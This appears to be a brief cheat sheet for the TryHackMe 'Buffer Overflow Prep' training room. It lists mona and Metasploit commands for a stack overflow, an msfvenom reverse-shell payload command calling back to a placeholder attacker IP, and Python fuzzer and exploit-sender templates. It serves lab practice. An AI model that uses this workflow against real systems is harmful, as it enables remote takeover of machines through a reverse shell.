我把code都放在github上,給個小星星><
https://github.com/stwater20/bufferoverflow-exploit
使用房間 TryHackMe – Buffer Overflow Prep
https://tryhackme.com/room/bufferoverflowprep
This room uses a 32-bit Windows 7 VM with Immunity Debugger and Putty preinstalled. Windows Firewall and Defender have both been disabled to make exploit writing easier.
mona configuration
!mona config -set workingfolder c:\mona\%p
pattern_create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
calcuate EIP offset
!mona findmsp -distance 600
Response
EIP contains normal pattern : … (offset XXXX)
Find bad char
!mona bytearray -b "\x00"
compare badchar
address is ESP
!mona compare -f C:\mona\oscp\bytearray.bin -a
Finding a Jump Point
!mona jmp -r esp -cpb "\x00"
Generate Payload
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
NOPs
padding = "\x90" * 16
Code
Exploit.py
import socket
ip = "MACHINE_IP"
port = 0
prefix = ""
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
fuzzer.py
#!/usr/bin/env python3
import socket, time, sys
ip = "xxx.xxx.xxx.xxx"
port = 0
timeout = 5
prefix = ""
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
badchar.py
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()Tutorial Video
